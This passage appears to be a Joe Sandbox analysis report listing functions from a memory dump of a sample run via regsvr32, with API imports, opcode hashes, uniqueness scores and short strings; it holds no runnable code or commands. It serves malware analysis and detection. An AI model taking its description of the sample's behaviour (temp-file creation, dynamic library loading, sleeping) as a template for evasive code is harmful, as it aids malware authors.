Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseConnectErrorHandleLast
String ID:
API String ID: 1311304170-0
Opcode ID: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
Instruction ID: 61df400e63785a1609a3fbbf5d2a2494e63a8d5d84a805bf0ca02e6de4064ce6
Opcode Fuzzy Hash: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
Instruction Fuzzy Hash: 4D814FF2A08B4286EA10CF95E444B6DB361FB44B84F944139DB8E976A8DFBCF558C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D14850, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 221UNIQUE

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI ref: 00007FF983D14B6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BE2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BE8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BEE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BF4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D14BFA

Strings

2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4, xrefs: 00007FF983D14896

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExistsFilePath
String ID: 2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4
API String ID: 1784296113-4103206974
Opcode ID: ab065dcdefc42338caf31267344cf4050606367dd2b4444a0ded6b75e13148f6
Instruction ID: c6856ac8dc1bbf0168f31807c66eaaf55f53baf9049a137e24de79acfc8a9d95
Opcode Fuzzy Hash: ab065dcdefc42338caf31267344cf4050606367dd2b4444a0ded6b75e13148f6
Instruction Fuzzy Hash: 78A199A2B1878181EF00DBA5D48579D6371FB847A4F845239EA5D67AEADFBCF085C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D44110, Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D44546

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8a7846ac665aaeed490fa70470950f5b4d74d6d24521f8cf68d5e25ee6ce012a
Instruction ID: 531fbd9d386f9d978a3ba18081c731f8902b0e30eba66559f5a375b9484e5d2f
Opcode Fuzzy Hash: 8a7846ac665aaeed490fa70470950f5b4d74d6d24521f8cf68d5e25ee6ce012a
Instruction Fuzzy Hash: A9C1C5A2A0868241EB61DB959444BBD6660FB41B80FCD0139DA4FA7792DFFCF49DC700

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983D01608, Relevance: 10.7, APIs: 7, Instructions: 153sleepUNIQUE

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32 ref: 00007FF983D0178F
GetTempFileNameW.KERNEL32 ref: 00007FF983D017B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01855
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0185B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01861
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01867
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0186D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01873
Sleep.KERNEL32 ref: 00007FF983D018BE

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateDirectoryFileNameSleepTemp
String ID:
API String ID: 3305644664-0
Opcode ID: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
Instruction ID: 4af2431ed6a73ce670de5c207392c7096bdda6cc3a08a5404be6d21e1a1dfa48
Opcode Fuzzy Hash: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
Instruction Fuzzy Hash: 1A5197A2B14681D5EE00DBA9D49876C2321FB447B4F845639DA6EA7AD9DEBCF085C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D01290, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102UNIQUE

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00007FF983D012BF
GetNativeSystemInfo.KERNEL32 ref: 00007FF983D012FD

Strings

d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D0131D

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
API String ID: 2296905803-2598894011
Opcode ID: f71619cf61c237e0b8a079814423286223058618906bbb967bddd811f69ed572
Instruction ID: 4306f5c3dcda0262dd6f322863c0ad90cce15617cf3f0b94a8290942b8e85e42
Opcode Fuzzy Hash: f71619cf61c237e0b8a079814423286223058618906bbb967bddd811f69ed572
Instruction Fuzzy Hash: A441EA62A187C1C1E610DB65F48479EB361FB857D0F945139EA9D93AA9DFBCF088C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D2DAC8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderUNIQUELIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF983D2DB4B
GetLastError.KERNEL32 ref: 00007FF983D2DB59
LoadLibraryExW.KERNEL32 ref: 00007FF983D2DB83
FreeLibrary.KERNEL32 ref: 00007FF983D2DBC9
GetProcAddress.KERNEL32 ref: 00007FF983D2DBD5

Strings

api-ms-, xrefs: 00007FF983D2DB6B

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
Instruction ID: 9e3f41a4b2bbc2c9500a0c59252a1b1819c13f0fdf6b743f922511093c1960c8
Opcode Fuzzy Hash: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
Instruction Fuzzy Hash: 1331B862B1AA4195EE12DB939810BB523A4BF48B90F9D4539ED2E97780DFFCF448C300

Uniqueness

Uniqueness Score: 23.02%

Function 00007FF983D4C3B0, Relevance: 9.3, APIs: 6, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF983D4C0E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4C121
Part of subcall function 00007FF983D4C0E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4C1A1
Part of subcall function 00007FF983D4C0E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4C1F5
Part of subcall function 00007FF983D4C0E0: _get_daylight.LIBCMT ref: 00007FF983D4C24D

GetLastError.KERNEL32 ref: 00007FF983D4C536
GetFileType.KERNEL32 ref: 00007FF983D4C54B
GetLastError.KERNEL32 ref: 00007FF983D4C555
CloseHandle.KERNEL32 ref: 00007FF983D4C588
CloseHandle.KERNEL32 ref: 00007FF983D4C6E3
GetLastError.KERNEL32 ref: 00007FF983D4C727

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLast_invalid_parameter_noinfo$CloseHandle$FileType_get_daylight
String ID:
API String ID: 4200888154-0
Opcode ID: 6617301959b47138dd1b45bd65ee79e39aec94bb8f0fc5b15f299cb2837ceb1f
Instruction ID: c4645f2e8bb5aaf7d786515eee7663ec46177c8e4a47ff72dae6081312becabb
Opcode Fuzzy Hash: 6617301959b47138dd1b45bd65ee79e39aec94bb8f0fc5b15f299cb2837ceb1f
Instruction Fuzzy Hash: DDC1D477B14A4196EB10CFA8D480BAC3761FB48B98B944239DA1FA77D4DF78E45AC300

Uniqueness

Uniqueness Score: 0.36%

Function 00007FF983D253D0, Relevance: 9.1, APIs: 6, Instructions: 95fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32 ref: 00007FF983D2543F
MapViewOfFile.KERNEL32 ref: 00007FF983D25463
CloseHandle.KERNEL32 ref: 00007FF983D25474
UnmapViewOfFile.KERNEL32 ref: 00007FF983D254B7
CloseHandle.KERNEL32 ref: 00007FF983D254C1
WriteFile.KERNEL32 ref: 00007FF983D25508

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingUnmapWrite
String ID:
API String ID: 2825254369-0
Opcode ID: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
Instruction ID: 7883ebfe3e33d02e652e58a2d00d565cce48284aea80a7b56a4917c121382f71
Opcode Fuzzy Hash: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
Instruction Fuzzy Hash: F23181B271564186EB50CF66E810B2DB6E1FB88B94B594138DE4E93B14DF38F806C700

Uniqueness

Uniqueness Score: 10.55%

Function 00007FF983D41318, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF983D4133B

Part of subcall function 00007FF983D46A4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D46A60

_get_daylight.LIBCMT ref: 00007FF983D4134C

Part of subcall function 00007FF983D469EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D46A00

_get_daylight.LIBCMT ref: 00007FF983D4135D

Part of subcall function 00007FF983D46A1C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D46A30

Part of subcall function 00007FF983D41DB4: HeapFree.KERNEL32 ref: 00007FF983D41DCA

GetTimeZoneInformation.KERNEL32 ref: 00007FF983D41384

Strings

?, xrefs: 00007FF983D41456

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$FreeHeapInformationTimeZone
String ID: ?
API String ID: 428190724-1684325040
Opcode ID: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
Instruction ID: a889df6caa8f9e3fba165663fc295b29dc53c2c3d75788bee3ce9deaa34a9e38
Opcode Fuzzy Hash: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
Instruction Fuzzy Hash: 006192B2A1864285E710DFA1E840BA977A4FB44794FC81139EA4FD7A95DFBCF449C700

Uniqueness

Uniqueness Score: 16.53%

Function 00007FF983D4EB28, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48UNIQUE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF983D4EB59
GetLastError.KERNEL32 ref: 00007FF983D4EB65
CloseHandle.KERNEL32 ref: 00007FF983D4EB7D
WriteConsoleW.KERNEL32 ref: 00007FF983D4EBC7

Strings

CONOUT$, xrefs: 00007FF983D4EB89

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseErrorHandleLast
String ID: CONOUT$
API String ID: 2157184327-3130406586
Opcode ID: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
Instruction ID: 9882730161ef733f9488a6eb8866ba6ebbf1d384fa5faee562bdb395b42a939e
Opcode Fuzzy Hash: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
Instruction Fuzzy Hash: 6311B462618B4186E751CB86F85472562A0FB48BE0F884238D95FD3B94CFBCE858C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D09C60, Relevance: 7.7, APIs: 5, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF983D03630: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D03715
Part of subcall function 00007FF983D03630: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D0371B

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09E55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09E5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09E61
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09E67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09FD0

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
Instruction ID: 5873bd8d8bb457af74cc4520d6c8c59a8ae4b91db17c4e7ea87118f77181eaac
Opcode Fuzzy Hash: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
Instruction Fuzzy Hash: F79180B270578191EA04DF65E458B6D6366FB40F88FC84039DB4E97A69DFBCE498C340

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983D45238, Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D45279
GetConsoleMode.KERNEL32 ref: 00007FF983D45338
GetLastError.KERNEL32 ref: 00007FF983D453B8

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: f7acdf6c5f94f76698663367c7b515ae0103dc78b6a982193462834025627eb9
Instruction ID: 66fc4ca06fbb147f8e5f1063863a2bbb0c562bb7845b508beee3ae21b479e580
Opcode Fuzzy Hash: f7acdf6c5f94f76698663367c7b515ae0103dc78b6a982193462834025627eb9
Instruction Fuzzy Hash: 9581B1A2E1860295FB10DBE59440BBD66A2BB44784FC8413DDE0FB7691EFBCB45AC710

Uniqueness

Uniqueness Score: 5.54%

Function 00007FF983D25530, Relevance: 7.6, APIs: 5, Instructions: 80timeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF983D25593
SetFilePointer.KERNEL32 ref: 00007FF983D255C6
GetLocalTime.KERNEL32 ref: 00007FF983D25618
SystemTimeToFileTime.KERNEL32 ref: 00007FF983D25628
FileTimeToDosDateTime.KERNEL32 ref: 00007FF983D2563D

Part of subcall function 00007FF983D25100: GetFileType.KERNEL32 ref: 00007FF983D25134

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileTime$Type$DateLocalPointerSystem
String ID:
API String ID: 60630809-0
Opcode ID: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
Instruction ID: 5237fb64868589723495b5d184495cb55b47da409ffffaba9b6ebbc67e82dd8a
Opcode Fuzzy Hash: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
Instruction Fuzzy Hash: 27317F72618B81C5D740CF65E440B6D77A5FB44B94FA40139EA8E83BA8EF79E449C740

Uniqueness

Uniqueness Score: 6.12%

Function 00007FF983D4D128, Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF983D4D150
_set_statfp.LIBCMT ref: 00007FF983D4D16B
_set_statfp.LIBCMT ref: 00007FF983D4D187
_set_statfp.LIBCMT ref: 00007FF983D4D1C3

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
Instruction ID: c3f81bd4caf3de5e211b132a46274af26835054fac48daf6f251f02b9ea57976
Opcode Fuzzy Hash: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
Instruction Fuzzy Hash: AE115BE2E58A0241FB64A1A4D855B7510807F55360F8D06BCED7FEA2DBCEECB88DC110

Uniqueness

Uniqueness Score: 0.74%

Function 00007FF983D2BA20, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF983D2BA3F
SetLastError.KERNEL32 ref: 00007FF983D2BAC6

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
Instruction ID: 4c3c030742deb1216e470c3a81d9d91cd77a81ea6a7c3d30208314038188e3c6
Opcode Fuzzy Hash: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
Instruction Fuzzy Hash: 051199A1A0924241F911DBA2A400F3836517F44790F8D463CDD3FA77D5DEECB849C710

Uniqueness

Uniqueness Score: 0.29%

Function 00007FF983D433E8, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D436C4

Part of subcall function 00007FF983D4BAA4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4BAC1

Strings

UTF-8, xrefs: 00007FF983D43643
ccs, xrefs: 00007FF983D435FF
UTF-16LEUNICODE, xrefs: 00007FF983D43662

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 97b79303dd24eed3cd717ff4096d0d592d141e51ccfb295756824807d79b1970
Instruction ID: 9dae9d1df13ecf7ec9bc7fca28f50ba34a7724e8d483f667e84b41c783724ffa
Opcode Fuzzy Hash: 97b79303dd24eed3cd717ff4096d0d592d141e51ccfb295756824807d79b1970
Instruction Fuzzy Hash: 9C8183A3D0815285EF66DFAD9110B7826A0BB10744FDD803DDA0BF3285CAADF869D781

Uniqueness

Uniqueness Score: 4.01%

Function 00007FF983D2C4E8, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190UNIQUELIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL ref: 00007FF983D2C558
_CallSETranslator.LIBVCRUNTIME ref: 00007FF983D2C5A3

Strings

RCC, xrefs: 00007FF983D2C574
MOC, xrefs: 00007FF983D2C56C

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
Instruction ID: b84e9902fabec4b0103d9f3a795a2226016b4719b937893eae137175ca37ac45
Opcode Fuzzy Hash: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
Instruction Fuzzy Hash: 899195B3A08B818AE710CBA5E4407AD7BA0F744788F58412EEE4E67755DF78F59AC700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D08550, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162UNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983D1B580: WideCharToMultiByte.KERNEL32 ref: 00007FF983D1B5F8
Part of subcall function 00007FF983D1B580: WideCharToMultiByte.KERNEL32 ref: 00007FF983D1B6AF

